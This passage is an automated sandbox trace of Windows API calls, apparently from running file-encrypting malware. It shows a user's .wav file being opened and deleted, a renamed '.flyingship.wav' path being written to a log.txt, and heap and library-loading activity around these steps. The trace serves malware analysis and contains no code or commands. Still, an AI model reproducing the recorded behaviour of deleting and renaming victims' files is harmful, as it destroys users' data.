(HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0186.475] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0186.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0186.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0186.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0186.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd498 [0186.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd498, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0186.476] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l\\wwubmhmkz.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0186.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0186.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0186.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0186.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0186.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0186.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0186.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0186.476] FreeLibrary (hLibModule=0x75990000) returned 1 [0186.476] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0186.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0186.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0186.477] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0186.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0186.477] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0186.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0186.477] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0186.477] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0186.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0186.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0186.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0186.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0186.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0186.477] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0186.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0186.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0186.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0186.477] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0186.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0186.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0186.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0186.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bda50 [0186.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bda50, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0186.479] FreeLibrary (hLibModule=0x75990000) returned 1 [0186.479] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0186.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0186.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0186.480] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.480] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.480] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.480] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0186.480] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.480] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.480] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0186.481] FreeLibrary (hLibModule=0x75990000) returned 1 [0186.481] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.481] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.481] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.481] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav", lpFilePart=0x0) returned 0x60 [0186.482] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbe5ec70, ftCreationTime.dwHighDateTime=0x1d5d8d9, ftLastAccessTime.dwLowDateTime=0xa5315d20, ftLastAccessTime.dwHighDateTime=0x1d5e38c, ftLastWriteTime.dwLowDateTime=0x1460c8c0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x8f92, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="WWUbMhmKz.wav", cAlternateFileName="WWUBMH~1.WAV")) returned 0x90ae18 [0186.483] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l\\wwubmhmkz.wav")) returned 1 [0186.485] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbe5ec70, ftCreationTime.dwHighDateTime=0x1d5d8d9, ftLastAccessTime.dwLowDateTime=0xa5315d20, ftLastAccessTime.dwHighDateTime=0x1d5e38c, ftLastWriteTime.dwLowDateTime=0x1460c8c0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x8f92, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="WWUbMhmKz.wav", cAlternateFileName="WWUBMH~1.WAV")) returned 0 [0186.485] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0186.485] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.486] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0186.486] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.486] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.486] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.486] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0186.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0186.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0186.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0186.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0186.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0186.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0186.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0186.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0186.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0186.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0186.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0186.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0186.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0186.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0186.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0186.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0186.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0186.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0186.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0186.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0186.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0186.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0186.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0186.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0186.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0186.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0186.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0186.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0186.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0186.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0186.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0186.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0186.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0186.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0186.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0186.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0186.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0186.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0186.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0186.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0186.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0186.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0186.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0186.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0186.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0186.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0186.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0186.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0186.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0186.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0186.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0186.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0186.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0186.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0186.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0186.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0186.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0186.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3478 | out: hHeap=0x8a0000) returned 1 [0186.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0186.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0186.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0186.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0186.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0186.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0186.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0186.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0186.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0186.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.489] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0186.491] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.491] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0186.491] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.491] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0186.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0186.492] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0186.492] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x24f1, lpOverlapped=0x0) returned 1 [0186.493] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0186.493] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x24f1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.493] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0186.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0186.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0186.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0186.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0186.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.flyingship.wav\r\n", cchWideChar=110, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 110 [0186.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6e) returned 0x906f38 [0186.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.flyingship.wav\r\n", cchWideChar=110, lpMultiByteStr=0x906f38, cbMultiByte=110, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.flyingship.wav\r\n", lpUsedDefaultChar=0x0) returned 110 [0186.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0186.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0186.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0186.493] WriteFile (in: hFile=0x138, lpBuffer=0x8fecd8*, nNumberOfBytesToWrite=0x6d, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x8fecd8*, lpNumberOfBytesWritten=0x87f43c*=0x6d, lpOverlapped=0x0) returned 1 [0186.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0186.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0186.494] CloseHandle (hObject=0x138) returned 1 [0186.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0186.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0186.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0186.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0186.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0186.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0186.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0186.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0186.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0186.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0186.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0186.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | 